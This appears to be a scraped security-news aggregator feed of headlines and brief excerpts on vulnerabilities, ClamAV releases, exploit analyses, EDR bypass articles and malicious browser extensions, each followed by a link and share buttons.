Bottlerocket OS An updated version of runc will be included in Bottlerocket 1.19.0, which will...
https://aws.amazon.com/security/security-bulletins/AWS-2024-001/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Azure Devops Zero-Click CI/CD Vulnerability
Legit Security found a zero-click vulnerability in Azure Pipelines that allows
an attacker to access secrets and internal information and perform actions in
elevated permissions in the context of a pipeline workflow. This could allow
attackers to move laterally in the organization and initiate supply chain attacks.
When a pipeline is triggered by a "pipeline resource trigger," it shows in the
platform as "Automatically Triggered For …" Instead of running in fork default
permissions, preventing any access to secrets and sensitive actions, Azure Pipelines
"confuses" the trigger for an internal build allowing access sensitive build secrets.
Exploitability depends on a public GitHub repository that runs Azure pipelines on pull-request,
with default Azure pipeline fork configurations to trigger...
https://www.cloudvulndb.org/azure-devops-zero-click
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Do you know if all your repositories have up-to-date dependencies?
Consider deploying the GitHub Action: Evergreen so that you know each of your repositories are leveraging active dependency management with Dependabot.
The post Do you know if all your repositories have up-to-date dependencies? appeared first on The GitHub Blog.
https://github.blog/security/supply-chain-security/do-you-know-if-all-your-repositories-have-up-to-date-dependencies/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Investigating Worldwide SMS Scams, and Tens of Millions of Dollars in Fraud
SMS services remain a critical part of telecommunications; they don't require
Internet access, and companies use them to inform their customers. This
combination of features makes them incredibly useful for criminals who use the
technology as a stepping stone in their never-ending campaigns. And if you think
that the new RCS messaging standard
[https://en.wikipedia.org/wiki/Rich_Communication_Services] will offer any
protection, you would be wrong. These types of scams will continue to spread
re
https://www.bitdefender.com/blog/labs/investigating-worldwide-sms-scams-and-tens-of-millions-of-dollars-in-fraud/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.3.0 Second Release Candidate now available!
We are excited to announce the ClamAV 1.3.0 release candidate.You can find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page.Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.3.0-rc2.tar.gz" does not require an internet connection to build. All dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies.For Docker users, there is no specific Docker tag for the release candidate, but you can use these tags:clamav/clamav:unstableclamav/clamav:unstable_base clamav/clamav-debian:unstableclamav/clamav-debian:unstable_base This...
http://blog.clamav.net/2024/01/clamav-130-second-release-candidate-now.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Sensor Intel Series: Top CVEs in December 2023
We add 6 CVEs to our list and do a brief roundup of some stats from 2023.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-december-2023
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV Debian multi-Arch Docker images now available!
We now offer official ClamAV docker images based on `debian:11-slim`.In addition to offering an alternative to the original Alpine Linux images, the new images are multi-arch images supporting `linux/amd64`, `linux/arm64`, and `linux/ppc64le`.ClamAV's Alpine-based and Debian-based Docker images are now built weekly to pick up security fixes in the base images. Check it out here.
http://blog.clamav.net/2024/01/clamav-debian-multi-arch-docker-images.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Stream-Jacking 2.0: Deep fakes power account takeovers on YouTube to maximize crypto-doubling scams
As of October 2023, researchers at Bitdefender Labs have been actively keeping
tabs
[https://www.bitdefender.com/blog/labs/a-deep-dive-into-stream-jacking-attacks-on-youtube-and-why-theyre-so-popular/]
on steam-jacking attacks against high-profile YouTube accounts used to conduct a
myriad of crypto doubling scams.
Fast forward to 2024; our investigation into the fraudulent takeovers and usage
of YouTube accounts has rendered new findings, as financially motivated threat
actors meticulously evo
https://www.bitdefender.com/blog/labs/stream-jacking-2-0-deep-fakes-power-account-takeovers-on-youtube-to-maximize-crypto-doubling-scams/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How to Recover an Unsaved Excel File
If your Excel file was left unsaved by accident, don’t fret – Microsoft understands mistakes happen and provides built-in functionality to help recover it. To recover an unsaved file, navigate...
The post How to Recover an Unsaved Excel File appeared first on Hacker Combat.
https://www.hackercombat.com/how-to-recover-unsaved-excel-file/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How to See Who Blocked You on Facebook
If you suspect someone has blocked you on Facebook, various methods exist to investigate their actions. One option would be searching for their name; they may have blocked you if...
The post How to See Who Blocked You on Facebook appeared first on Hacker Combat.
https://www.hackercombat.com/how-to-see-who-blocked-you-on-facebook/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How To Access Your Photos On iCloud
iCloud can be an easy and secure way to back up photos and videos, but accessing those files across devices may prove challenging. Thank goodness there are multiple ways to...
The post How To Access Your Photos On iCloud appeared first on Hacker Combat.
https://www.hackercombat.com/how-to-access-your-photos-on-icloud/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Why is the iPhone Force Restart Not Working?
If the iPhone force restart does not work as intended, there may be an issue with the iOS system. To address this, look for physical damage to buttons used for...
The post Why is the iPhone Force Restart Not Working? appeared first on Hacker Combat.
https://www.hackercombat.com/iphone-force-restart-not-working/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
YouTube Not Working on iPhone? Here's How to Fix It
If the YouTube app on your iPhone is crashing or will not open, there are various fixes you can try, such as force quitting the app, rebooting your device, and...
The post YouTube Not Working on iPhone? Here’s How to Fix It appeared first on Hacker Combat.
https://www.hackercombat.com/youtube-not-working-on-iphone/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Avast Updates Babuk Ransomware Decryptor in Cooperation with Cisco Talos and Dutch Police
In cooperation with Cisco Talos and Dutch Police, Avast is releasing an updated version of the Avast Babuk decryption tool, capable of restoring files encrypted by the Babuk variant called Tortilla.
The post Avast Updates Babuk Ransomware Decryptor in Cooperation with Cisco Talos and Dutch Police appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/avast-updates-babuk-ransomware-decryptor-in-cooperation-with-cisco-talos-and-dutch-police/?utm_source=rss&utm_medium=rss&utm_campaign=avast-updates-babuk-ransomware-decryptor-in-cooperation-with-cisco-talos-and-dutch-police
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
GitHub and the Ekoparty 2023 Capture the Flag
The GitHub Security Lab teamed up with Ekoparty once again to create some challenges for its yearly Capture the Flag competition!
The post GitHub and the Ekoparty 2023 Capture the Flag appeared first on The GitHub Blog.
https://github.blog/security/application-security/github-and-the-ekoparty-2023-capture-the-flag/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Best EDR Of The Market (BEOTM) – Endpoint Detection and Response Testing Tool
BestEDROfTheMarket is a naive user-mode EDR (Endpoint Detection and Response) tool designed to serve as a testing ground
https://www.darknet.org.uk/2024/01/best-edr-of-the-market-beotm-endpoint-detection-and-response-testing-tool/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Silly EDR Bypasses and Where To Find Them
Abusing exception handlers to hook and bypass user mode EDR hooks.
https://malwaretech.com/2023/12/silly-edr-bypasses-and-where-to-find-them.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
An Introduction to Bypassing User Mode EDR Hooks
Understanding the basics of user mode EDR hooking, common bypass techniques, and their limitations.
https://malwaretech.com/2023/12/an-introduction-to-bypassing-user-mode-edr-hooks.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How to Temporarily Deactivate Instagram?
Instagram is an amazing social platform where you can stay in touch with your friends and influencers, but sometimes it can be too much. Taking a break may help. Instagram...
The post How to Temporarily Deactivate Instagram? appeared first on Hacker Combat.
https://www.hackercombat.com/how-to-temporarily-deactivate-instagram/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How To Delete Facebook Business Page?
An inactive Facebook business page won’t do your brand any good; sometimes, it may be best to delete it and start fresh. Deleting a page is straightforward and can be...
The post How To Delete Facebook Business Page? appeared first on Hacker Combat.
https://www.hackercombat.com/how-to-delete-facebook-business-page/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Do AirPods Work With Android?
AirPods work well with Android, but the experience may be less satisfying or convenient compared to Apple’s ecosystem. Certain features are unavailable such as customizing double-tap functionality and access to...
The post Do AirPods Work With Android? appeared first on Hacker Combat.
https://www.hackercombat.com/do-airpods-work-with-android/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How to Know If Someone Screengrabs Your Instagram Story
Instagram doesn’t inform its users when their Story or Reel has been screengrabbed – no matter whether they have millions of followers or just an everyday account – which means...
The post How to Know If Someone Screengrabs Your Instagram Story appeared first on Hacker Combat.
https://www.hackercombat.com/how-to-know-if-someone-screengrabs-your-instagram-story/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How To Scan a QR Code On iPhone
The iPhone offers multiple ways of scanning QR codes, but the quickest and easiest method is using its built-in camera app. Open your camera app and point at a QR...
The post How To Scan a QR Code On iPhone appeared first on Hacker Combat.
https://www.hackercombat.com/how-to-scan-a-qr-code-on-iphone/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.3.0 release candidate now available!
The ClamAV 1.3.0 release candidate is now available.You may find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page.Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.3.0-rc.tar.gz" does not require an internet connection to build. All dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies.For Docker users, there is no specific Docker tag for the release candidate, but you can use the clamav:unstable or clamav:unstable_base tags.The release candidate phase is expected...
http://blog.clamav.net/2023/12/clamav-130-release-candidate-now.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Scaling vulnerability management across thousands of services and more than 150 million findings
Learn about how we run a scalable vulnerability management program built on top of GitHub.
The post Scaling vulnerability management across thousands of services and more than 150 million findings appeared first on The GitHub Blog.
https://github.blog/security/application-security/scaling-vulnerability-management-across-thousands-of-services-and-more-than-150-million-findings/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
First handset with MTE on the market
@import url(https://themes.googleusercontent.com/fonts/css?kit=DFQxm4rd7fRHgM9OTejWVT5Vho6BE7M80rHXEVKqXWcinf93kRmgH2T4xWS0JMLd96xlbbE5D7Gw2o7jubnkMA);.lst-kix_mpwcgajc4xj4-0>li{counter-increment:lst-ctn-kix_mpwcgajc4xj4-0}ol.lst-kix_mpwcgajc4xj4-4{list-style-type:none}.lst-kix_d02lf6xv7lip-8>li:before{content:"- "}ol.lst-kix_mpwcgajc4xj4-3{list-style-type:none}ol.lst-kix_mpwcgajc4xj4-6{list-style-type:none}.lst-kix_d02lf6xv7lip-7>li:before{content:"- "}.lst-kix_6winxzvxkxle-2>li:before{content:"- "}.lst-kix_6winxzvxkxle-4>li:before{content:"- "}ol.lst-kix_mpwcgajc4xj4-5{list-style-type:none}ol.lst-kix_mpwcgajc4xj4-0{list-style-type:none}ol.lst-kix_mpwcgajc4xj4-2.start{counter-reset:lst-ctn-kix_mpwcgajc4xj4-2 0}.lst-kix_d02lf6xv7lip-6>li:before{content:"- "}.lst-kix_mpwcgajc4xj4-6>li{counter-increment:lst-ctn-kix_mpwcgajc4xj4-6}ol.lst-kix_mpwcgajc4xj4-2{list-style-type:none}.lst-kix_6winxzvxkxle-3>li:before{content:"-...
https://googleprojectzero.blogspot.com/2023/11/first-handset-with-mte-on-market.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.2.1, 1.1.3, 1.0.4, 0.103.11 patch versions published
Today, we are publishing the 1.2.1, 1.1.3, 1.0.4, and 0.103.11 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub. Continue reading to learn what changed in each version.1.2.1ClamAV 1.2.1 is a patch release with the following fixes:Eliminate security warning about unused "atty" dependency.GitHub pull request.Upgrade the bundled UnRAR library (libclamunrar) to version 6.2.12.GitHub pull request.Build system: Fix link error with Clang/LLVM/LLD version 17. Patch courtesy of Yasuhiro Kimura.GitHub pull request.Fix alert-exceeds-max feature for files > 2GB and < max-filesize.GitHub pull request. Special thanks to Yasuhiro Kimura for code contributions and bug reports.1.1.3ClamAV...
http://blog.clamav.net/2023/10/clamav-121-113-104-010311-patch.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Implementing a “Share on Mastodon” button for a blog
I decided that I would make it easier for people to share my articles on social media, most importantly on Mastodon. However, my Hugo theme didn't support showing a “Share on Mastodon” button yet. It wasn't entirely trivial to add support either: unlike with centralized solutions like Facebook where a simple link is sufficient, here one would need to choose their home instance first.
As far as existing solutions go, the only reasonably sophisticated approach appears to be Share₂Fedi. It works nicely, privacy-wise one could do better however. So I ended up implementing my own solution while also generalizing that solution to support a variety of different Fediverse applications in addition to Mastodon.
Contents
Why not Share₂Fedi?
Share on Mastodon or on Fediverse?
...
https://palant.info/2023/10/19/implementing-a-share-on-mastodon-button-for-a-blog/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
An analysis of an in-the-wild iOS Safari WebContent to GPU Process exploit
@import url(https://themes.googleusercontent.com/fonts/css?kit=lhDjYqiy3mZ0x6ROQEUoUw);.lst-kix_fcb9u51bqgft-4>li{counter-increment:lst-ctn-kix_fcb9u51bqgft-4}ol.lst-kix_shbeio5ln3sf-3.start{counter-reset:lst-ctn-kix_shbeio5ln3sf-3 0}.lst-kix_shbeio5ln3sf-0>li{counter-increment:lst-ctn-kix_shbeio5ln3sf-0}ul.lst-kix_wvnn2lytn2eh-3{list-style-type:none}ul.lst-kix_wvnn2lytn2eh-2{list-style-type:none}ul.lst-kix_wvnn2lytn2eh-5{list-style-type:none}ul.lst-kix_wvnn2lytn2eh-4{list-style-type:none}ul.lst-kix_wvnn2lytn2eh-1{list-style-type:none}.lst-kix_shbeio5ln3sf-6>li{counter-increment:lst-ctn-kix_shbeio5ln3sf-6}ul.lst-kix_wvnn2lytn2eh-0{list-style-type:none}ol.lst-kix_shbeio5ln3sf-7.start{counter-reset:lst-ctn-kix_shbeio5ln3sf-7 0}ol.lst-kix_fcb9u51bqgft-2.start{counter-reset:lst-ctn-kix_fcb9u51bqgft-2...
https://googleprojectzero.blogspot.com/2023/10/an-analysis-of-an-in-the-wild-ios-safari-sandbox-escape.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
It might Be Time to Rethink Phishing Awareness
Phishing awareness can be a powerful security tool, or a complete disaster. It all hinges on how you implement it.
https://malwaretech.com/2023/09/it-might-be-time-to-rethink-phishing-awareness.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Analyzing a Modern In-the-wild Android Exploit
By Seth Jenkins, Project ZeroIntroductionIn December 2022, Google's Threat Analysis Group (TAG) discovered an in-the-wild exploit chain targeting Samsung Android devices. TAG's blog post covers the targeting and the actor behind the campaign. This is a technical analysis of the final stage of one of the exploit chains, specifically CVE-2023-0266 (a 0-day in the ALSA compatibility layer) and CVE-2023-26083 (a 0-day in the Mali GPU driver) as well as the techniques used by the attacker to gain kernel arbitrary read/write access.Notably, several of the previous stages of the exploit chain used n-day vulnerabilities:CVE-2022-4262, a 0-day vulnerability in Chrome was exploited in the Samsung browser to achieve RCE.CVE-2022-3038, a Chrome n-day that unpatched in the Samsung browser, was used...
https://googleprojectzero.blogspot.com/2023/09/analyzing-modern-in-wild-android-exploit.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A year after the disastrous breach, LastPass has not improved
In September last year, a breach at LastPass' parent company GoTo (formerly LogMeIn) culminated in attackers siphoning out all data from their servers. The criticism from the security community has been massive. This was not so much because of the breach itself, such things happen, but because of the many obvious ways in which LastPass made matters worse: taking months to notify users, failing to provide useful mitigation instructions, downplaying the severity of the attack, ignoring technical issues which have been publicized years ago and made the attackers' job much easier. The list goes on.
Now this has been almost a year ago. LastPass promised to improve, both as far as their communication goes and on the technical side of things. So let's take a look at whether they managed to...
https://palant.info/2023/09/05/a-year-after-the-disastrous-breach-lastpass-has-not-improved/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AgentSmith HIDS – Host Based Intrusion Detection
AgentSmith HIDS is a powerful component of a Host-based Intrusion Detection system, it has anti-rootkit functionalities and is a very performant way to collect information about a host.
https://www.darknet.org.uk/2023/08/agentsmith-hids-host-based-intrusion-detection/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Chrome Sync privacy is still very bad
Five years ago I wrote an article about the shortcomings of Chrome Sync (as well as a minor issue with Firefox Sync). Now Chrome Sync has seen many improvements since then. So time seems right for me to revisit it and to see whether it respects your privacy now.
Spoiler: No, it doesn't. It improved, but that's an improvement from outright horrible to merely very bad. The good news: today you can use Chrome Sync in a way that preserves your privacy. Google however isn't interested in helping you figure out how to do it.
Contents
The default flow
The privacy-preserving flow
What does Google do with your data?
It could have been worse
Comparison to Firefox Sync
The default flow
Chrome Sync isn't some obscure feature of Google Chrome. In fact, as of Chrome...
https://palant.info/2023/08/29/chrome-sync-privacy-is-still-very-bad/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.2.0 feature version and 1.1.2, 1.0.3, 0.103.10 patch versions published
The ClamAV 1.2.0 feature release is now stable and available for download on the ClamAV downloads page, on the Github Release page, and through Docker Hub.Today, we are also publishing the 1.1.2, 1.0.3, and 0.103.10 security patch versions. You may be surprised about the impromptu patch release. Indeed, we just published patch versions earlier this month. Unfortunately, a recent CVE for the UnRAR* library has prompted us to prepare these additional updates. We strongly encourage everyone to upgrade to one of these versions. The release files for the patch versions are also available for download on the ClamAV downloads page, on the Github Release page, and through Docker Hub. Because ClamAV 1.2.0 is now the latest release, the release files for version 1.1.2 will be found under the...
http://blog.clamav.net/2023/08/clamav-120-feature-version-and-111-102.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.1.1, 1.0.2, 0.103.9 patch versions published
Today, we are releasing the following critical patch versions for ClamAV: 1.1.1 1.0.2 0.103.9 ClamAV 0.105 and 0.104 have reached end-of-life according to the ClamAV's End of Life (EOL) policy and will not be patched.The release files are available for download on ClamAV.net, on the Github Release page, and through Docker Hub.Note: We observed an issue building ClamAV on Windows using the recently released libjson-c version 0.17. If you are building ClamAV for Windows, you should use libjson-c version 0.16 or prior. 1.1.1 ClamAV 1.1.1 is a critical patch release with the following fixes: CVE-2023-20197 Fixed a possible denial of service vulnerability in the HFS+ file parser. This issue affects versions 1.1.0, 1.0.1 through 1.0.0, 0.105.2 through 0.105.0,...
http://blog.clamav.net/2023/07/2023-08-16-releases.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
H1 2023 Bad Bots Review
Bot traffic for the first half of 2023 was fairly typical, some rapid change in a few industries notwithstanding. Learn who got hit hard and who got off easy.
https://www.f5.com/labs/articles/threat-intelligence/monthly-bot-stats-report-h1-2023
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.2.0 release candidate now available
We are excited to announce the ClamAV 1.2.0 release candidate.You may find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page.Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.2.0-rc.tar.gz" does not require an internet connection to build. All dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies.For Docker users, there is no specific Docker tag for the release candidate, but you can use the clamav:unstable or clamav:unstable_base tags.The release candidate phase...
http://blog.clamav.net/2023/08/clamav-120-release-candidate-now.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
MTE As Implemented, Part 1: Implementation Testing
@import url(https://themes.googleusercontent.com/fonts/css?kit=cGvuclDC_Z1vE_cnVEU6AbvdjsQquauI-GoInd1DzsRjfxSl7duaBsON8MRB32eGNP6BCxV-AQSEvP01Vpd9xT0e5qzIIUg9OvSRGeMDk3I);.lst-kix_exl34y7adtul-6>li{counter-increment:lst-ctn-kix_exl34y7adtul-6}.lst-kix_s8b3u49h11dr-4>li:before{content:"- "}.lst-kix_s8b3u49h11dr-6>li:before{content:"- "}.lst-kix_w66ctsc8735u-5>li{counter-increment:lst-ctn-kix_w66ctsc8735u-5}.lst-kix_s8b3u49h11dr-3>li:before{content:"- "}.lst-kix_s8b3u49h11dr-7>li:before{content:"- "}.lst-kix_7336pfhg38rf-8>li{counter-increment:lst-ctn-kix_7336pfhg38rf-8}ol.lst-kix_w66ctsc8735u-1.start{counter-reset:lst-ctn-kix_w66ctsc8735u-1 0}.lst-kix_s8b3u49h11dr-5>li:before{content:"- "}ol.lst-kix_pmivlm2h8rwq-6.start{counter-reset:lst-ctn-kix_pmivlm2h8rwq-6 0}.lst-kix_cm1sbgja1sfy-8>li:before{content:"-...
https://googleprojectzero.blogspot.com/2023/08/mte-as-implemented-part-1.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
MTE As Implemented, Part 3: The Kernel
@import url(https://themes.googleusercontent.com/fonts/css?kit=4mNYFHt_IKFsPe52toizH6nwuZUPj2AFYBEz-aMyENVctA_KpTDBIb9wIwVqFCm-);.lst-kix_46kwnuz47r-3>li{counter-increment:lst-ctn-kix_46kwnuz47r-3}ol.lst-kix_46kwnuz47r-1.start{counter-reset:lst-ctn-kix_46kwnuz47r-1 0}.lst-kix_8lngbvh6wilc-4>li{counter-increment:lst-ctn-kix_8lngbvh6wilc-4}ol.lst-kix_46kwnuz47r-0{list-style-type:none}ol.lst-kix_46kwnuz47r-2{list-style-type:none}.lst-kix_46kwnuz47r-2>li{counter-increment:lst-ctn-kix_46kwnuz47r-2}.lst-kix_8lngbvh6wilc-5>li{counter-increment:lst-ctn-kix_8lngbvh6wilc-5}ol.lst-kix_cp4qttrp12lb-6.start{counter-reset:lst-ctn-kix_cp4qttrp12lb-6 0}ol.lst-kix_46kwnuz47r-1{list-style-type:none}ol.lst-kix_46kwnuz47r-4{list-style-type:none}ol.lst-kix_46kwnuz47r-3{list-style-type:none}ol.lst-kix_8lngbvh6wilc-8.start{counter-reset:lst-ctn-kix_8lngbvh6wilc-8...
https://googleprojectzero.blogspot.com/2023/08/mte-as-implemented-part-3-kernel.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
MTE As Implemented, Part 2: Mitigation Case Studies
@import url(https://themes.googleusercontent.com/fonts/css?kit=4mNYFHt_IKFsPe52toizH6nwuZUPj2AFYBEz-aMyENXbDjL3Cv1g7CpfdyRoONLEXShKQSnoFmUtAspFfwQKag);ol.lst-kix_46kwnuz47r-8.start{counter-reset:lst-ctn-kix_46kwnuz47r-8 0}.lst-kix_46kwnuz47r-3>li{counter-increment:lst-ctn-kix_46kwnuz47r-3}ol.lst-kix_46kwnuz47r-1.start{counter-reset:lst-ctn-kix_46kwnuz47r-1 0}.lst-kix_46kwnuz47r-8>li{counter-increment:lst-ctn-kix_46kwnuz47r-8}ol.lst-kix_46kwnuz47r-0{list-style-type:none}ol.lst-kix_46kwnuz47r-2{list-style-type:none}.lst-kix_46kwnuz47r-2>li{counter-increment:lst-ctn-kix_46kwnuz47r-2}ol.lst-kix_cp4qttrp12lb-6.start{counter-reset:lst-ctn-kix_cp4qttrp12lb-6 0}ol.lst-kix_46kwnuz47r-1{list-style-type:none}ol.lst-kix_46kwnuz47r-4{list-style-type:none}ol.lst-kix_46kwnuz47r-3{list-style-type:none}.lst-kix_cp4qttrp12lb-5>li{counter-increment:lst-ctn-kix_cp4qttrp12lb-5}ol.lst-kix_46kwnuz47r-6{list-style-type:none}.lst-kix_46kwnuz47r-5>li:before{content:"("...
https://googleprojectzero.blogspot.com/2023/08/mte-as-implemented-part-2-mitigation.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Summary: MTE As Implemented
@import url(https://themes.googleusercontent.com/fonts/css?kit=DFQxm4rd7fRHgM9OTejWVT5Vho6BE7M80rHXEVKqXWdbV0WvE1cEyAoIq5yYZlSc);.lst-kix_exl34y7adtul-6>li{counter-increment:lst-ctn-kix_exl34y7adtul-6}.lst-kix_kzys3uxts4nk-6>li:before{content:"" counter(lst-ctn-kix_kzys3uxts4nk-6,decimal) ". "}.lst-kix_kzys3uxts4nk-8>li:before{content:"" counter(lst-ctn-kix_kzys3uxts4nk-8,lower-roman) ". "}.lst-kix_s8b3u49h11dr-4>li:before{content:"- "}.lst-kix_s8b3u49h11dr-6>li:before{content:"- "}.lst-kix_kzys3uxts4nk-7>li:before{content:"" counter(lst-ctn-kix_kzys3uxts4nk-7,lower-latin) ". "}.lst-kix_w66ctsc8735u-5>li{counter-increment:lst-ctn-kix_w66ctsc8735u-5}.lst-kix_s8b3u49h11dr-3>li:before{content:"- "}.lst-kix_s8b3u49h11dr-7>li:before{content:"- "}.lst-kix_7336pfhg38rf-8>li{counter-increment:lst-ctn-kix_7336pfhg38rf-8}ol.lst-kix_w66ctsc8735u-1.start{counter-reset:lst-ctn-kix_w66ctsc8735u-1...
https://googleprojectzero.blogspot.com/2023/08/summary-mte-as-implemented.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Why browser extension games need access to all websites
When installing browser extensions in Google Chrome, you are asked to confirm the extension's permissions. In theory, this is supposed to allow assessing the risk associated with an extension. In reality however, users typically lack the knowledge to properly interpret this prompt. For example, I've often seen users accusing extension developers of spying just because the prompt says they could.
On the other hand, people will often accept these cryptic prompts without thinking twice. They expect the browser vendors to keep them out of harm's way, trust that isn't always justified [1] [2] [3]. The most extreme scenario here is casual games not interacting with the web at all, yet requesting access to all websites. I found a number of extensions that will abuse this power to hijack...
https://palant.info/2023/06/14/why-browser-extension-games-need-access-to-all-websites/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Shutting down old ClamAV Bugzilla
ClamAV will shut down the old ClamAV Bugzilla server in July. Users who have any outstanding Bugzilla reports should move them to GitHub Issues as soon as possible.We disabled new tickets in Bugzilla in December 2021 in favor of GitHub Issues for all new ClamAV bug reports and a new process for reporting vulnerabilities as defined by a new security policy. As it has now been 18 months since the switch to GitHub Issues, we have decided to shut down our old Bugzilla. We plan to take the Bugzilla server off the internet sometime after July 1 and keep it as an internal reference for our development team. It will no longer be accessible to the public.
http://blog.clamav.net/2023/06/shutting-down-old-clamav-bugzilla.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Another cluster of potentially malicious Chrome extensions
We've already seen Chrome extensions containing obfuscated malicious code. We've also seen PCVARK's malicious ad blockers. When looking for more PCVARK extensions, I stumbled upon an inconspicuous extension called “Translator - Select to Translate.” The only unusual thing about it were its reviews, lots of raving positive reviews mixed with usability complains. That, and the permissions: why does a translator extension need webRequest and webRequestBlocking permissions?
When I looked into this extension, I immediately discovered a strange code block. Supposedly, it was buggy locale processing. In reality, it turned out to be an obfuscated malicious logic meant to perform affiliate fraud.
That extension wasn't alone. I kept finding similar extensions until I had a list of 109 extensions,...
https://palant.info/2023/06/08/another-cluster-of-potentially-malicious-chrome-extensions/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Introducing PCVARK and their malicious ad blockers
It isn't news that the overwhelming majority of ad blockers in Chrome Web Store is either outright malicious or waiting to accumulate users before turning malicious. So it wasn't a surprise that the very first ad blocker I chose semi-randomly (Adblock Web with 700,000 users) turned out malicious. Starting from it, I found another malicious extension (Ad-Blocker, 700,000 users) and two more that have been removed from Chrome Web Store a year ago (BitSafe Adblocker and Adblocker Unlimited).
All these ad blockers and probably some more were developed by the company PCVARK. According to Malwarebytes Labs, this company specializes in developing “potentially unwanted programs.” In other words: they show users warnings about alleged compromise, only to push them into installing their software....
https://palant.info/2023/06/05/introducing-pcvark-and-their-malicious-ad-blockers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How malicious extensions hide running arbitrary code
Two days ago I wrote about the malicious extensions I discovered in Chrome Web Store. At some point this article got noticed by Avast. Once their team confirmed my findings, Google finally reacted and started removing these extensions. Out of the 34 extensions I reported, only 8 extensions remain. These eight were all part of an update where I added 16 extensions to my list, an update that came too late for Avast to notice.
Note: Even for the removed extensions, it isn't “mission accomplished” yet. Yes, the extensions can no longer be installed. However, the existing installations remain. From what I can tell, Google didn't blocklist these extensions yet.
Avast ran their own search, and they found a bunch of extensions that I didn't see. So how come they missed eight extensions?...
https://palant.info/2023/06/02/how-malicious-extensions-hide-running-arbitrary-code/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
More malicious extensions in Chrome Web Store
Two weeks ago I wrote about the PDF Toolbox extension containing obfuscated malicious code. Despite reporting the issue to Google via two different channels, the extension remains online. It even gained a considerable number of users after I published my article.
A reader tipped me off however that the Zoom Plus extension also makes a request to serasearchtop[.]com. I checked it out and found two other versions of the same malicious code. And I found more extensions in Chrome Web Store which are using it.
So now we are at 18 malicious extensions with a combined user count of 55 million. The most popular of these extensions are Autoskip for Youtube, Crystal Ad block and Brisk VPN: nine, six and five million users respectively.
Update (2023-06-01): With an increased sample I was able to find...
https://palant.info/2023/05/31/more-malicious-extensions-in-chrome-web-store/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
padre – Padding Oracle Attack Exploiter Tool
padre is an advanced exploiter and Padding Oracle attack tool that can be deployed against CBC mode encryption.
https://www.darknet.org.uk/2023/05/padre-padding-oracle-attack-exploiter-tool/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
End of life (EOL) policy change, 0.103 one year extension, 0.105 past end of life
End of life (EOL) policy change ClamAV is making a minor change to our EOL policy. The original EOL policy stated that Long Term Support (LTS) versions will lose access to signature updates on the same date that we end support for additional patch versions. We are changing the policy to allow signature updates for at least one year after we stop supporting the release with patch versions. 0.103 support extension We are also announcing a one-year extension of support for ClamAV 0.103 LTS. We decided to extend the life of the 0.103 LTS release because of the significant changes to the build system in 0.104 and the change in 0.105 requiring the Rust programming language toolchain to compile ClamAV. The one-year support extension does not apply to future LTS...
http://blog.clamav.net/2023/05/end-of-life-eol-policy-change-0103-one.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Issue With IAM Supporting Multiple MFA Devices
